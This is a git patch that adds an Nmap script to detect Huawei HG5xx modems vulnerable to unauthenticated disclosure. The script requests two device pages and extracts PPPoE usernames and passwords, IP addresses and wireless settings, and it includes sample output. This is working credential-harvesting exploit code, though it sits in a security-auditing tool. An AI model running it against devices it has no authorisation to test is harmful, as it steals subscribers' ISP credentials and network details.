From cc1ba1ff3deebc76df5f3d15c35f8daea1ad29ec Mon Sep 17 00:00:00 2001
From: paulino
Date: Sun, 27 May 2012 19:18:23 +0000
Subject: [PATCH] Adds http-huawei-hg5xx-vuln. Detects Huawei modems models HG530x, HG520x, HG510x and possibly others that are vulnerable to a remote credential and information disclosure vulnerability. It also extracts the PPPoE credentials and other interesting configuration values.
---
 scripts/http-huawei-hg5xx-vuln.nse | 103 +++++++++++++++++++++++++++++
 scripts/script.db | 1 +
 2 files changed, 104 insertions(+)
 create mode 100644 scripts/http-huawei-hg5xx-vuln.nse
diff --git a/scripts/http-huawei-hg5xx-vuln.nse b/scripts/http-huawei-hg5xx-vuln.nse
new file mode 100644
index 000000000..73490c0ff
--- /dev/null
+++ b/scripts/http-huawei-hg5xx-vuln.nse
@@ -0,0 +1,103 @@
+description = [[
+Detects Huawei modems models HG530x, HG520x, HG510x and possibly others that are vulnerable to a remote credential and information disclosure vulnerability. It also extracts the PPPoE credentials
+and other interesting configuration values.
+
+Attackers can query the URIs "/Listadeparametros.html" and "/wanfun.js" to extract sensitive information
+including PPPoE credentials, firmware version, model, gateway, dns servers and active connections among other values.
+
+This vulnerability was discovered and reported by Adiaz from Comunidad Underground de Mexico (http://underground.org.mx).
+]]
+
+---
+-- @usage nmap -p80 --script http-huawei-hg5xx-vuln
+-- @usage nmap -sV http-huawei-hg5xx-vuln
+--
+-- @output
+-- PORT STATE SERVICE VERSION
+-- 80/tcp open http Huawei aDSL modem EchoLife HG530 (V100R001B122gTelmex) 4.07 -- UPnP/1.0 (ZyXEL ZyWALL 2)
+-- | http-huawei-hg5xx-vuln:
+-- | VULNERABLE:
+-- | Remote credential and information disclosure in modems Huawei HG5XX
+-- | State: VULNERABLE (Exploitable)
+-- | Description:
+-- | Modems Huawei 530x, 520x and possibly others are vulnerable to remote credential and information disclosure.
+-- | Attackers can query the URIs "/Listadeparametros.html" and "/wanfun.js" to extract sensitive information
+-- | including PPPoE credentials, firmware version, model, gateway, dns servers and active connections among other values
+-- | Disclosure date: 2011-01-1
+-- | Extra information:
+-- |
+-- | Model:EchoLife HG530
+-- | Firmware version:V100R001B122gTelmex
+-- | External IP:xxx.xxx.xx.xxx
+-- | Gateway IP:xxx.xx.xxx.xxx
+-- | DNS 1:200.33.146.249
+-- | DNS 2:200.33.146.241
+-- | Network segment:192.168.1.0
+-- | Active ethernet connections:0
+-- | Active wireless connections:3
+-- | BSSID:0xdeadbeefcafe
+-- | Wireless Encryption (Boolean):1
+-- | PPPoE username:xxx
+-- | PPPoE password:xxx
+-- | References:
+-- |_ http://routerpwn.com/#huawei
+---
+
+author = "Paulino Calderon "
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"exploit","version","vuln"}
+
+local shortport = require "shortport"
+local http = require "http"
+local vulns = require "vulns"
+
+portrule = shortport.http
+
+action = function(host, port)
+ local vuln = {
+ title = 'Remote credential and information disclosure in modems Huawei HG5XX',
+ state = vulns.STATE.NOT_VULN,
+ description = [[
+Modems Huawei 530x, 520x and possibly others are vulnerable to remote credential and information disclosure.
+Attackers can query the URIs "/Listadeparametros.html" and "/wanfun.js" to extract sensitive information
+including PPPoE credentials, firmware version, model, gateway, dns servers and active connections among other values.]],
+ references = {
+ 'http://routerpwn.com/#huawei'
+ },
+ dates = {
+ disclosure = {year = '2011', month = '01', day = '1'},
+ },
+ }
+ local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+ local open_session = http.get(host.ip, port, "/Listadeparametros.html")
+ if open_session and open_session.status == 200 then
+ vuln.state = vulns.STATE.EXPLOIT
+ local _, _, pppoe_user = string.find(open_session.body, 'Usuario PPPoE:\n(.-)')
+ local _, _, model = string.find(open_session.body, 'Modelo de m\195\179dem:\n(.-)')
+ local _, _, firmware_version = string.find(open_session.body, 'Versi\195\179n de Firmware:\n(.-)')
+ local _, _, gateway = string.find(open_session.body, 'Puerta de Enlace de Internet:\n(.-)')
+ local _, _, ip = string.find(open_session.body, 'IP de Internet del m\195\179dem:\n(.-)')
+ local _, _, dns1 = string.find(open_session.body, 'DNS Primario:\n(.-)')
+ local _, _, dns2 = string.find(open_session.body, 'DNS Secundario:\n(.-)')
+ local _, _, network_segment = string.find(open_session.body, 'Segmento de Red Local:\n(.-)')
+ local _, _, active_ethernet = string.find(open_session.body, 'Conexiones Ethernet Activas:\n(.-)')
+ local _, _, active_wireless = string.find(open_session.body, 'Conexiones Inal\195\161mbricas Activas:\n(.-)')
+ local _, _, ssid = string.find(open_session.body, 'Nombre de Red Inal\195\161mbrica %(SSID%):\n(.-)')
+ local _, _, encryption = string.find(open_session.body, 'Encriptaci\195\179n Activada %(0: No, 1:S\195\173%):\n(.-)')
+ local info = string.format("\nModel:%s\nFirmware version:%s\nExternal IP:%s\nGateway IP:%s\nDNS 1:%s\nDNS 2:%s\n"..
+ "Network segment:%s\nActive ethernet connections:%s\nActive wireless connections:%s\nBSSID:%s\nWireless Encryption (Boolean):%s\nPPPoE username:%s\n",
+ model, firmware_version, ip, gateway, dns1, dns2, network_segment, active_ethernet, active_wireless, ssid, encryption, pppoe_user)
+
+ local ppp = http.get(host.ip, port, "/wanfun.js")
+ if ppp.status and ppp.status == 200 then
+ local _, _, ppp_pwd = string.find(ppp.body, 'var pwdppp = "(.-)"')
+ info = string.format("%sPPPoE password:%s", info, ppp_pwd)
+ end
+ if firmware_version and model then
+ port.version.product = string.format("Huawei aDSL modem %s (%s)", model, firmware_version)
+ nmap.set_port_version(host, port, "hardmatched")
+ end
+ vuln.extra_info = info
+ return vuln_report:make_output(vuln)
+ end
+end
diff --git a/scripts/script.db b/scripts/script.db
index 8840f22c6..5593e1555 100644
--- a/scripts/script.db
+++ b/scripts/script.db
@@ -144,6 +144,7 @@ Entry { filename = "http-gitweb-projects-enum.nse", categories = { "discovery",
 Entry { filename = "http-google-malware.nse", categories = { "discovery", "external", "malware", "safe", } }
 Entry { filename = "http-grep.nse", categories = { "discovery", "safe", } }
 Entry { filename = "http-headers.nse", categories = { "discovery", "safe", } }
+Entry { filename = "http-huawei-hg5xx-vuln.nse", categories = { "exploit", "version", "vuln", } }
 Entry { filename = "http-icloud-findmyiphone.nse", categories = { "discovery", "safe", } }
 Entry { filename = "http-icloud-sendmsg.nse", categories = { "discovery", "safe", } }
 Entry { filename = "http-iis-webdav-vuln.nse", categories = { "intrusive", "vuln", } }